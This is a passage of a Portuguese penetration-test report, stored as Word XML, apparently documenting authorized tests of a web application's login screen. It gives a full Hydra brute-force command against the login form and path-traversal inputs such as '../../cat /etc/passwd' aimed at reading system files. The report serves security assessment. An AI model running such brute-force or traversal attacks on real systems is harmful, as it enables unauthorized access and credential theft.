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60" w:rsidRPr="00D56FE7" w:rsidRDefault="00F15F82" w:rsidP="00A5289A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 RELATÓRIO DE EXECUÇÃO DOS TESTES </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00D136D4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Nessa sessão, serão relatados, de forma detalhada, os resultados </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:t>obtidos na execução dos testes em cada iteração planejada. Serão apresentados os passos utilizados para detectar possíveis vulnerabilidades, as vulnerabilidades encontrad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quais danos estas podem causar caso sejam exploradas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15F82" w:rsidRPr="00D56FE7" w:rsidRDefault="00F15F82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3154F" w:rsidRPr="00D136D4" w:rsidRDefault="008C6DC7" w:rsidP="00F3154F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136D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Iteração 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00E52521" w:rsidP="00AC1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1.1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Tela Login - Exploração via Força Bruta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01/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00E52521" w:rsidP="00AC10D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Duração</w:t>
      </w:r>
      <w:r w:rsidR="002A0DD8" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> total das sessões executadas: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</w:t>
      </w:r>
      <w:r w:rsidR="00546F66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hora e 20 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1803" w:rsidRPr="00D56FE7" w:rsidRDefault="004E1803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2521" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7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546F66" w:rsidP="001A1C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Utilizar a ferramenta Hydra, abordada no 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>sub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capítulo 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>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00CC3790" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F15B6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ara</w:t>
      </w:r>
      <w:r w:rsidR="003E1ACB" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontrar</w:t>
      </w:r>
      <w:r w:rsidR="00417333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r</w:t>
      </w:r>
      <w:r w:rsidR="00417333" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> meio d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CC3790" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tentativ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 erro, um login de um usuário e senha válidos par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cessar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o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E1803" w:rsidRPr="00D56FE7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2A0DD8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2A0DD8" w:rsidRPr="00D56FE7" w:rsidRDefault="00546F66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nfigurar a Hydra, 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>com o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arâmetros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C12C3D" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login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2C3D" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>senh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ara que ela realize os testes de acesso com força bruta na tela de Login.</w:t>
      </w:r>
      <w:r w:rsidR="00EC2366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0DD8" w:rsidRPr="00D56FE7" w:rsidRDefault="002A0DD8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DD8" w:rsidRPr="00D56FE7" w:rsidRDefault="00827015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Pr="00D56FE7" w:rsidRDefault="00EC2366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2A0DD8" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>proteção</w:t>
      </w:r>
      <w:r w:rsidR="00FF6B3E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Antis</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pam, como Captcha que impeça a ferramenta automatizada de prosseguir até o fim do teste.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1803" w:rsidRPr="00D56FE7" w:rsidRDefault="004E1803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1803" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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C12C3D" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="0058462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definido.</w:t>
      </w:r>
      <w:r w:rsidR="00C12C3D" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A ferramenta está esperando 3 parâmetros quando, a tela de Login só utiliza 2 na requisição.</w:t>
      </w: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62E" w:rsidRPr="00D56FE7" w:rsidRDefault="0058462E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2A0DD8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Inserir um login de usuário válido e possíveis senhas mais comuns utilizadas para acesso de um sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A6729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Comando utilizado: hydra -l admin -P forcaBruta IP_do_servidor http-post-form “</w:t>
      </w:r>
      <w:r w:rsidR="00AC10DC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login.php:login=^USER^:senha=^PASS^:logado=false”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A6729" w:rsidRPr="00D56FE7" w:rsidRDefault="000A6729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58462E" w:rsidRDefault="00ED180C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hydra” executa a ferramenta Hydra.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRP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l” significa o login utilizado no momento. Nesse caso, deve ser sempre “admin”, pois foi o único usuário válido fornecido para a realização de testes no </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="0058462E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado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-P” aponta para o arquivo contendo as senhas que a H</w:t>
      </w:r>
      <w:r w:rsidR="00B7146E" w:rsidRPr="0058462E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ydra tentará utilizar para acessar o sistema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58462E" w:rsidRDefault="00B7146E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>IP_do_servidor</w:t>
      </w:r>
      <w:r w:rsidRPr="0058462E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”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 é o IP onde está hospedada a aplicação alvo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="0058462E" w:rsidRDefault="00DD5893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http-post-form” informa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 o método utilizado</w:t>
      </w:r>
      <w:r w:rsidR="001F5050" w:rsidRPr="0058462E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> para fazer a requisição ao servidor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: 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 xml:space="preserve">POST do </w:t>
      </w:r>
      <w:r w:rsidR="001F5050" w:rsidRPr="0058462E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">protocolo </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="0058462E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTTP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0058462E" w:rsidRDefault="008C6DC7" w:rsidP="0058462E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AC10DC" w:rsidRPr="0058462E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 xml:space="preserve">/login.php:login=^USER^:senha=^PASS^:logado=false”  </w:t>
      </w:r>
      <w:r w:rsidRPr="0058462E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58462E" w:rsidRDefault="008C6DC7" w:rsidP="005846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USER é onde a Hydra deve inserir o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login</w:t>
      </w:r>
      <w:r w:rsidR="003745C8" w:rsidRPr="005846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462E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>válido usado na requisição;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="0058462E" w:rsidRDefault="008C6DC7" w:rsidP="0058462E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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PASS é onde a Hydra deve inserir a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senha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a-se que o sistema interrompa as sessões de testes configuradas na ferramenta Hydra.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0336" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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F71E4B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517685" w:rsidRPr="00D56FE7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. Todas as sessões </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>de teste</w:t>
      </w:r>
      <w:r w:rsidR="00564674" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s foram executadas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pela Hydra </w:t>
      </w:r>
      <w:r w:rsidR="00564674" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sem nenhum tipo de interrupção por parte do sistema alvo.</w:t>
      </w:r>
      <w:r w:rsidR="0056467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5846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8C6DC7" w:rsidRPr="00D56FE7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A6729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nfigurar a ferramenta Hydra para executar </w:t>
      </w:r>
      <w:r w:rsidR="000A6729" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uma 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 utilizando o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login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“admin”, cadastrado na base de dados do sistema</w:t>
      </w:r>
      <w:r w:rsidR="000A672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D180C" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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Além disso, usar um dicionário de senhas retiradas da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Lista de Piores Senhas de 2015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 SplashData [1]. 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62442F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 utilizado:</w:t>
      </w:r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hydra -l admin -P forcaBruta IP_do_servidor http-post-form “</w:t>
      </w:r>
      <w:r w:rsidR="00DD5893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>/login.php:login=^USER^:senha=^PASS^:logado=false” -V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C10DC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58462E" w:rsidRDefault="00ED180C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hydra” executa a ferramenta Hydra.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“-l” significa o login utilizado no momento. Nesse caso, deve ser sempre “admin”, pois foi o único usuário válido fornecido para a realização de testes no </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="0058462E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado</w:t>
      </w:r>
      <w:r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-P” aponta para o arquivo contendo as senhas que a Hydra tentará utilizar para acessar o sistema;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRP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IP_do_servidor” é o IP onde está hospedada a aplicação alvo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="0058462E" w:rsidRDefault="00DD5893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http-post-form” informa o método utilizado para fazer a requisição ao servidor: POST do protocolo HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00265100" w:rsidRPr="0058462E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0058462E" w:rsidRDefault="00265100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r w:rsidR="000C72B3" w:rsidRPr="0058462E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58462E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/login.php:login=^USER^:senha=^PASS^:logado=false”  </w:t>
      </w:r>
      <w:r w:rsidRPr="0058462E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58462E" w:rsidRDefault="00265100" w:rsidP="0058462E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USER é onde a Hydra deve inserir o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login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:rsidR="00265100" w:rsidRPr="0058462E" w:rsidRDefault="00265100" w:rsidP="0058462E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 xml:space="preserve">PASS é onde a Hydra deve inserir a </w:t>
      </w:r>
      <w:r w:rsidRPr="0058462E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>senha</w:t>
      </w:r>
      <w:r w:rsidRPr="0058462E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58462E" w:rsidRDefault="008C6DC7" w:rsidP="0058462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462E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“-V” é para exibir no console o resultado da operação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7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8462E" w:rsidRPr="00D56FE7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possua proteção Antispam, como Captcha que impeça a ferramenta automatizada de prosseguir até o fim do teste.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0058462E" w:rsidRDefault="0058462E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10DC" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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76417A" w:rsidRPr="00D56FE7" w:rsidRDefault="005A089C" w:rsidP="005846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D76012" w:rsidRPr="00D56FE7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="00456110" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.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 Conforme mostra a figura 1, todas as tentativas configuradas na Hydra foram executadas com sucesso.</w:t>
      </w:r>
      <w:r w:rsidR="0045611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>O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 xml:space="preserve"> sistema é vulnerável ao acesso via forç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 xml:space="preserve">bruta, pois permite que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várias requisições sejam feitas ao servidor por tempo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 xml:space="preserve">indeterminado. Como não há mecanismo de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lastRenderedPageBreak/>
        <w:t>bloqueio par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 w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inúmeras requisições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, o sistema abre uma brecha para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que senhas de acesso ao sistema possam ser descobertas após</w:t>
      </w:r>
      <w:r w:rsidR="00C86D69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6417A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>várias tentativas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00456110" w:rsidRPr="00D56FE7" w:rsidRDefault="0045611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036F8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14B0EB79" wp14:editId="62462CB7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>158115</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>201930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="3820160"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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036F84" w:rsidP="00036F84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gura 1 - Resultado da execução de testes no campo login utilizando a Hydra.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A089C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E650F5" w:rsidP="00E65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1.2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. Tela Login - Exploração via Path Transversal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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entre os dias 31/03/16 e 01/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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2 horas e 30 minutos. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036F84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1557D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Para identificar a estrutura de diretórios do sistema dentro do servidor, f</w:t>
      </w:r>
      <w:r w:rsidR="00ED7438" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oi utilizada</w:t>
      </w:r>
      <w:r w:rsidR="0045732E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00623C1F" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="0045732E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">funcionalidade </w:t>
      </w:r>
      <w:r w:rsidR="00E158B8" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Spider </w:t>
      </w:r>
      <w:r w:rsidR="0045732E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00ED7438" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a ferramenta Burp Suite</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, ambas abordadas no subcapítulo 3.2. </w:t>
      </w:r>
      <w:r w:rsidR="00ED7438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Os resultados obtidos, conforme mostra a figura 2, foram utilizados para executar os testes deste tópico.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A7473" w:rsidRPr="00D56FE7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A16AD95" wp14:editId="230DEBEC">
            <wp:extent cx="2507141" cy="31718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F" w:rsidRPr="00D56FE7" w:rsidRDefault="00623C1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Figura 2 - Resultado mapeamento diretórios do sistema</w:t>
      </w:r>
      <w:r w:rsidR="002D4365" w:rsidRPr="00D56FE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036F84" w:rsidRDefault="00036F84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46A20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ada a estrutura hierárquica do sistema descrita na figura </w:t>
      </w:r>
      <w:r w:rsidR="00BE4C3F" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2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o objetivo do teste é utilizar entradas maliciosas na URL para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conseguir acesso a loca</w:t>
      </w:r>
      <w:r w:rsidR="002D4365" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is não autorizados a um usuário</w:t>
      </w:r>
      <w:r w:rsidR="00623C1F" w:rsidRPr="00D56FE7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istema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365" w:rsidRPr="00D56FE7" w:rsidRDefault="002D436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FF14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D56FE7" w:rsidRDefault="008C6DC7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Quando o sistema não consegue efetuar um login, o seguinte parâmetro é exibido na url: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login.php?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7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ogado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=false.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00B959F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primeira </w:t>
      </w:r>
      <w:r w:rsidR="00623C1F" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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E0AF9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fará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a requisição ao servidor alterando a url citada anteriormente para: </w:t>
      </w:r>
      <w:r w:rsidR="002D4365" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7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../../dir, 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.</w:t>
      </w:r>
      <w:r w:rsidR="00DF0646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F1403" w:rsidRDefault="00284BB3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1403">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00FF1403">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>comando “../../” foi utilizado para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor no qual a aplicação está hospedada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FF1403" w:rsidRDefault="008C6DC7" w:rsidP="00FF140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1403">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O comando </w:t>
      </w:r>
      <w:r w:rsidR="00827015" w:rsidRPr="00FF1403">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dir, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1403">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>no cmd do</w:t>
      </w:r>
      <w:r w:rsidR="00BA7CEE" w:rsidRPr="00FF1403">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sistema operacional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 Windows</w:t>
      </w:r>
      <w:r w:rsidR="00827015" w:rsidRPr="00FF1403">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1403">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> serve para listar os arquivos e diretórios dentro da pasta atual.</w:t>
      </w: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sultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="0082701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27015" w:rsidRPr="00D56FE7" w:rsidRDefault="00827015" w:rsidP="00FF140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D56FE7" w:rsidRDefault="005967D5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FF14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B959F5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 ../../cat /etc/passwd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85362D" w:rsidRDefault="0081785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O comando</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="0085362D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “../../” foi utilizado para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor no qual a aplicação está hospedada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="0085362D" w:rsidRDefault="008C6DC7" w:rsidP="0085362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O</w:t>
      </w:r>
      <w:r w:rsidR="00817857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comando </w:t>
      </w:r>
      <w:r w:rsidRPr="0085362D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/passwd 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, no sistema operacional Linux, serve para listar o conteúdo de passwd (local onde ficam armazenados informações de senha dos usuários). Como o sistema operacional do servidor em questão é Windows, então caso seja executado, o esperado seria um erro. </w:t>
      </w:r>
    </w:p>
